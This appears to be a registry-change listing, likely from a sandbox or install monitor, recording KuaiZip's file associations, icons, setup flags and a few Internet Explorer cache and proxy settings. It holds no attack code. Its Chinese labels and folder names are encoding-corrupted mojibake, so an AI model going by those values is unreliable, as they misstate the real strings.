"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 025 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.083\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.051]
"(Default)" = "KuaiZip.051"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.057]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.082]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\KuaiZip_FileAsso.Origin\.098]
"(Default)" = "NoAssociate.KZ"

[HKCR\.017]
"(Default)" = "KuaiZip.017"

[HKCR\.021]
"(Default)" = "KuaiZip.021"

[HKCR\KuaiZip.mou\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.06\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.095]
"(Default)" = "NoAssociate.KZ"

[HKCR\.061]
"(Default)" = "KuaiZip.061"

[HKCR\.001]
"(Default)" = "KuaiZip.001"

[HKCR\KuaiZip.038\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.040\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.086]
"(Default)" = "KuaiZip.086"

[HKCR\KuaiZip_FileAsso.Origin\.03]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.055]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.059]
"set" = "1"

[HKCR\.031]
"(Default)" = "KuaiZip.031"

[HKCR\KuaiZip_FileAsso.Origin\.021]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.014]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.086]
"set" = "1"

[HKCR\KuaiZip.kz]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ KZ Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.096]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 096 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.066\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.069]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 069 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.097]
"(Default)" = "KuaiZip.097"

[HKCR\KuaiZip.047]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 047 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.arj]
"set" = "1"

[HKCR\KuaiZip.zip\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,2"

[HKCR\KuaiZip.026\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.z\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.tar]
"(Default)" = "KuaiZip.tar"

[HKCR\.007]
"(Default)" = "KuaiZip.007"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.037]
"set" = "1"

[HKCR\.067]
"(Default)" = "KuaiZip.067"

[HKCR\KuaiZip.024]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 024 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.bz2\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.035\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.08]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 08 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.03]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tar]
"set" = "1"

[HKCR\KuaiZip.rpm\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.059]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.052\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.03\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.071\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.025]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.bz2]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.050]
"set" = "1"

[HKCR\KuaiZip.011\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.060]
"(Default)" = "KuaiZip.060"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.z]
"set" = "1"

[HKCR\KuaiZip.041\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.012\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.028\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.010]
"(Default)" = "KuaiZip.010"

[HKCR\KuaiZip.073]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 073 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.047]
"(Default)" = "KuaiZip.047"

[HKCR\KuaiZip.028\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.016\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.038\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.066]
"(Default)" = "KuaiZip.066"

[HKCR\.07]
"(Default)" = "KuaiZip.07"

[HKCR\.076]
"(Default)" = "KuaiZip.076"

[HKCR\.090]
"(Default)" = "KuaiZip.090"

[HKCR\KuaiZip_FileAsso.Origin\.018]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.09]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 09 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.014]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 014 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.kz\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,1"

[HKCR\KuaiZip_FileAsso.Origin\.028]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.gzip]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ GZIP Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.mou]
"set" = "1"

[HKCR\KuaiZip.058\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.076]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 076 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.085\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.089]
"(Default)" = "KuaiZip.089"

[HKCR\KuaiZip.099]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 099 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.092]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.079\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.034\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.035]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.061\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.038]
"(Default)" = "NoAssociate.KZ"

[HKCR\.041]
"(Default)" = "KuaiZip.041"

[HKCR\KuaiZip.090\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\KuaiZip.043\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.01]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 01 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.092]
"(Default)" = "KuaiZip.092"

[HKCR\KuaiZip_FileAsso.Origin\.073]
"(Default)" = "NoAssociate.KZ"

[HKCR\.09]
"(Default)" = "KuaiZip.09"

[HKCR\KuaiZip_FileAsso.Origin\.052]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.057\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.011]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 011 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.045]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 045 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.085]
"(Default)" = "KuaiZip.085"

[HKCR\KuaiZip.011\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.094]
"(Default)" = "KuaiZip.094"

[HKCR\KuaiZip.075\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.03]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 03 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.012]
"(Default)" = "NoAssociate.KZ"

[HKCR\.cab]
"(Default)" = "KuaiZip.cab"

[HKCR\KuaiZip.019\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.046]
"(Default)" = "KuaiZip.046"

[HKCR\KuaiZip_FileAsso.Origin\.tgz]
"(Default)" = ""

[HKCR\.z]
"(Default)" = "KuaiZip.z"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.083]
"set" = "1"

[HKCR\KuaiZip.033\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.094\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.008]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.05]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.020\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.079]
"(Default)" = "KuaiZip.079"

[HKCR\KuaiZip.032\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.040]
"(Default)" = "KuaiZip.040"

[HKCR\KuaiZip.091\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.042]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.tgz\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.099]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.064]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 064 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.009\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.093]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.04]
"set" = "1"

[HKCR\KuaiZip.037\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.077\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\KuaiZip.050]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 050 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.089]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.020\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.059]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 059 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.034]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.053]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.067]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.kz]
"(Default)" = ""

[HKCR\KuaiZip_FileAsso.Origin\.007]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.019]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.055]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.061]
"set" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\KuaiZip_FileAsso.Origin\.015]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.044]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 044 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.023]
"set" = "1"

[HKCR\.048]
"(Default)" = "KuaiZip.048"

[HKCR\KuaiZip_FileAsso.Origin\.078]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.051]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.056]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.051]
"(Default)" = "NoAssociate.KZ"

[HKCR\.042]
"(Default)" = "KuaiZip.042"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\KuaiZip.wim\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.023]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 023 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.053\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.020]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.059\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.mou]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.022]
"(Default)" = "NoAssociate.KZ"

[HKCR\.008]
"(Default)" = "KuaiZip.008"

[HKCR\KuaiZip.047\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397296"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.047]
"set" = "1"

[HKCR\KuaiZip.017\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.009]
"(Default)" = "KuaiZip.009"

[HKCR\KuaiZip.013\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.096\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.019]
"(Default)" = "KuaiZip.019"

[HKCR\KuaiZip.wim\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.085]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 085 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.039]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.036]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 036 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.064]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tgz]
"set" = "1"

[HKCR\.002]
"(Default)" = "KuaiZip.002"

[HKCR\.018]
"(Default)" = "KuaiZip.018"

[HKCR\KuaiZip_FileAsso.Origin\.030]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.021]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 021 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.jar\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.065\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.083]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 083 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.049\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.048\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.025]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.017]
"set" = "1"

[HKCR\KuaiZip.037]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 037 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.015]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.012]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.069]
"set" = "1"

[HKCR\KuaiZip.074]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 074 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.004\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.04]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 04 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.022]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 022 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.022]
"(Default)" = "KuaiZip.022"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.021]
"set" = "1"

[HKCR\.028]
"(Default)" = "KuaiZip.028"

[HKCR\KuaiZip.049\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.049]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 049 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.015]
"(Default)" = "KuaiZip.015"

[HKCR\KuaiZip.082\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.009]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 009 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.020]
"(Default)" = "KuaiZip.020"

[HKCR\KuaiZip.wim]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ WIM Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.019]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 019 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.050\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.093]
"(Default)" = "KuaiZip.093"

[HKCR\.095]
"(Default)" = "KuaiZip.095"

[HKCR\KuaiZip.071\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.038]
"set" = "1"

[HKCR\KuaiZip.090\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.044\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.wim]
"set" = "1"

[HKCR\.049]
"(Default)" = "KuaiZip.049"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.01]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.06]
"set" = "1"

[HKCR\KuaiZip.036\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.002]
"set" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\KuaiZip.048\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.018]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 018 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.09]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.zip]
"set" = "1"

[HKCR\KuaiZip.073\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.006]
